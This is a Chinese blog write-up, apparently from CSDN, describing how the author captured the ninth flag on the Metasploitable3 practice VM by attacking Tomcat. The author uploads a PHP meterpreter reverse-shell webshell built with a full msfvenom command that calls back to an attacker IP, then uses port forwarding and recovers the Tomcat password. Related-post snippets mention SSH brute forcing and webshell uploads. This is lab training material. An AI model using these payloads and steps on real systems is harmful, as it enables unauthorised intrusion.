Metasploitable3-Jack of Clubs 第九个flag

最新推荐文章于 2021-08-31 21:38:52 发布
最新推荐文章于 2021-08-31 21:38:52 发布
阅读量738 收藏
点赞数
分类专栏: 安全 文章标签: metasploitable3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/avasy/article/details/86760381
版权 
 

这是第九个flag.
首先从nmap扫描中我们可以得出以下信息
8282/tcp open http Apache Tomcat/Coyote JSP engine 1.1
http-favicon: Apache Tomcat
http-server-header: Apache-Coyote/1.1
http-title: Apache Tomcat/8.0.33

Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器。

因为它对应http服务,所以先用浏览器访问一下


看见manager app,点一下,弹出一个窗口让你输入用户名和密码,这让我很容易地就联想到爆破

爆破可以用burpsuite,也可以用msf里面对应的tomcat模块
我这里就用msf爆破
search tomcat

设置相关参数

爆破,可惜没能成功,我尝试从别的地方出发

我记得前面8585的端口那里有个上传目录,我准备从那里下手,

先生成一个webshell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=4444 -f raw>davtest.php

用cadaver上传上去并运行,拿到shell

现在马上去tomcat的目录查看相关密码

没有权限,
meterpreter里面自带有一个portfwd命令,它的功能是端口转发

设置好相关参数
成功连接

现在去找tomcat密码

得到相关密码为sploit

直接找flag把

双击打开
另外我找到flag的路径
C:\vagrant\resources\flags
在meterpreter上把它们全部下载下来
这一次要把它们一锅端了

先看看jack_of_club

直接是png大功告成了,本篇就完结吧,剩下的那些我在下篇说。

avasy
关注
专栏目录
metasploitable3 第一个flag, King of Diamond
avasy的博客
02-01 2952
nmap扫描对应的端口 192.168.0.105 8585 tcp http open Apache httpd 2.2.21 (Win64) PHP/5.3.10 用浏览器访问一下 打开后网页的下方有一个phpinfo和phpadmin,这时候可以点进去看一下,看相关的信息 从phpinfo中我们得到以下有关靶机的信息 靶机系统版本: Windows NT METASPLOITABLE3 6....
nim-jack:Nim语言的JACK绑定
02-04
Nim-jack是Nim编程语言的一个库,它提供了对JACK音频系统(Jack Audio Connection Kit)的绑定。JACK是一款强大的低延迟音频框架,它允许应用程序之间进行音频流的实时传输。Nim-jack使得Nim程序员可以利用JACK的...
Metasploitable3-flag
Makboli的博客
08-19 847
Metasploitable3-flag 写这个文章是因老师给了我一个Metasploitable3的靶机,就来搞搞玩玩,然后经过不断地乱撞,最终搞到了15个flag,以下是我寻找15个flag的过程,希望小白的文章能对大家有所帮助。 ace_of_hearts 1.ace_of_hearts 这里刚刚拿到靶场环境,就随便翻了翻电脑里的文件,发现了一张红桃A 然后感觉这应该就是一个flag,打开kali尝试连接该靶机172.21.11.227. 先nmap扫一下,发现了8022端口可以搞一搞 然后打开msf
Metasploitable3-flag{K-4-K-}
Makboli的博客
08-31 324
Metasploitable3-flag{K-4-K-} 废话不多说,直接上干货 king_of_clubs 我们下载下来的kingofclubs为.exe文件,将它放进kali里面,利用命令:upx -d kingofclubs.exe 做脱壳处理 之后把它拿出来改为zip文件尝试查看里面的内容。 看到了COFF_SYMBOLS,这个表示疑问,感觉可能会成为入手点。便百度了一下COFF,然后搜到了.out文件的相关知识 看完之后感觉可能是有东西隐藏在了.out文件下吧 尝试一下将kingofclubs.e
Metasploitable3-flag{jack_seven_joker}
Makboli的博客
08-20 717
Metasploitable3 继上一次的两个flag,这次再为大家更新两个新的,希望对大家有帮助。 1.Jack_of_hearts 2.seven_of_spades 3.joker 前言 继上一次的两个flag,这次再为大家更新两个新的,希望对大家有帮助。 1.Jack_of_hearts 第一次扫描发现了22端口的ssh也是可以搞一搞的 接下来我们用kali自带的hydra爆破,利用hydra里面的爆破,爆破用户名和密码,这里其实只需要爆破密码即可。 相关命令:hydra -L username.t
Metasploitable3-flag-six_jack_four
Makboli的博客
08-24 383
Metasploitable3 继上次的继续为师傅们更新!最近生活不如意,但还是要调整好心情继续冲! six_of_diamonds 因为我们之前是扫到了21端口开启,就从21端口下手,因为21端口是ftp服务,大胆一点直接尝试连接ftp 账号vagrant,密码vagrant。因为之前就总是这个,结果一试就连上了,省去了爆破的时间。 将six_of_diamonds.zip文件复制下来,需要密码,也猜测vagrant。结果也对了。 如果不对的话就考虑fcrackzip爆破了 打开拿到flag jack_
PyPI 官网下载 | drf-safe-jack-4.0.4.tar.gz
02-10
标题 "PyPI 官网下载 | drf-safe-jack-4.0.4.tar.gz" 暗示了这是一个在Python Package Index (PyPI) 上发布的软件包,它被压缩成tar.gz格式供用户下载。这个包的名字是 "drf-safe-jack",版本号为4.0.4,通常在...
Java弱引用实现源码-jack-compiler:jack语言编译器
06-04
Java弱引用实现源码jack-编译器 效果 演示1: class Main { function void main () { String s; Output. printString ( " Hello, world! " ); Output. println (); Output. printString ( " What's your name? " ); ...
project-bear-banks-ian-jack-jaehwi-jessica:GitHub Classroom创建的project-bear-banks-ian-jack-jaehwi-jessica
03-30
从理论上讲,我们的目标受众是(1)想与我们合作的人,(2)为Bear Banks工作的人和(3)目前与我们合作的人(3/29注意:要添加的其他功能) 。 主要特点:熊银行将执行ATM通常可能执行的任何操作。 以下是熊银行...
misc-Jack,题目附件
最新发布
11-16
在IT行业中,"misc"通常指的是“杂项”,它可能包含各种不同类型的问题或挑战,而“Jack”在这里可能是一个特定的挑战名或者是与这个压缩包相关的主题。由于标签为"CTF(Capture The Flag)"附件,我们可以推断这可能...
针对 Metasploitable 3 的渗透测试
07-31
针对 Metasploitable 3 的渗透测试-漏洞银行大咖面对面5-Demon
Metasploitable3-Six of Diamonds 第三个flag
avasy的博客
02-02 1692
在上次渗透中,我发现靶机对应的8585端口里面存在一个upload目录,这让我想到靶机可能存在文件上传漏洞,尝试上传一个菜刀马。 我用到了kali的工具cadaver 在上传php文件前,我首先上传一个txt文件验证一下 先在kali内新建一个txt文件 保存后上传 上传成功,打开浏览器验证 用gedit新建一个chopper.php文件,用cadver上传 上传成功 然后用菜刀连接 我...
Metasploitable3-King of Hearts 第二个flag
avasy的博客
02-01 1285
在抓捕第一个方块K的过程中,同时发现了第二个flag,红心K的踪迹,它与方块K在同一个木目录下下面,具体过程和前面第一个flag一样,略过不表 来到2016目录,点进去,再从09目录点进去 来到熟悉的目录下面 king of heart和上一个flag不同的地方在于,它的文件名并没有明明白白地写着king of hearts,而是写成metasploitable3_flag,在metaspl...
Metasploitable3-Seven of Spades 第六个flag
avasy的博客
02-02 1005
  经过信息搜集,我发现靶机开放22端口 所以还是使用ssh爆破,这一次用xhydra,xhydra是hydra的图形化界面 在终端上输入xhydra,设置好相关参数 点一下Passwords菜单,设置好相关字典 在Tuning设置相关进程 开始爆破,得出7个可用账户密码 任选一个用户登录 进入靶机,找到public目录,经过寻找,最终在Documents目录下找到seven_of_spa...
Metasploitable3-Jack of Hearts 第四个flag
avasy的博客
02-02 971
  今天要拿下的是第四个flagJack of Heart 攻击方向是22端口 启动msf 准备好爆破的字典 在msf中搜索ssh爆破模块 使用相关模块并设置参数 set PASS_FILE ~/pass.txt set USER_FILE ~/user.txt set rhost 192.168.0.100 run 爆破完成 爆出7个session 用管理员账户进行ssh登录 找到相关f...
Metasploitable3-Ace of Hearts 第八个flag
avasy的博客
02-03 998
这是第八个flag. 结合之前的信息搜集,我们打开nessus的扫描报告 CVE-2015-8249 ZOHOManageEngineDesktopCentral(DC)是美国卓豪(ZOHO)公司的一套桌面管理解决方案。该方案包含软件分发、补丁管理、系统配置、远程控制等功能模块,可对桌面机以及服务器管理的整个生命周期提供支持。ZOHOManageEngineDC9版本中的FileUploadSe...
Metasploitable3 + VMware 安装与使用 教程
热门推荐
cmcaimao的博客
04-17 1万+
在学习metasploit时我们往往需要一个靶场,以下介绍这个metasploitable 3里面集成了,系统漏洞、dwwa、论坛、sqlite等。它也做为一个学习渗透测试的测试环境。 Metasploitable3Metasploitable2的升级版本,它是一个虚拟靶机系统,里面含有大量未被修复的安全漏洞,它主要是用于metasploit-framework测试的漏洞目标。 不过Meta...
metasploitable3 靶机介绍与相关信息搜集
avasy的博客
02-01 2874
metasploitable3:虚拟靶机 发布于2016年11月,含有15个flag文件,每个flag文件都是扑克指牌 所需系统要求: System Requirements: OS capable of running all of the required applications listed below VT-x/AMD-V Supported Processor recommende...
Metasploitable 3 实战渗透测试
weixin_51167520的博客
03-13 1949
Metasploitable 3 实战渗透测试 实验环境:KALI Metasploitable 3 初始环境 靶机(192.168.60.201): kali(192.168.60.131): 靶机环境扫描(信息收集) 使用nmap对靶机进行扫描 威胁建模与漏洞分析(端口与服务验证) 弱口令登录管理:用户名和密码都是admin: 漏洞分析、渗透攻击、后渗透攻击 自动发送文件漏洞 目录自动随机帮助隐藏文件 发送文本文件,并尝试MOVE到可执行文件的..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值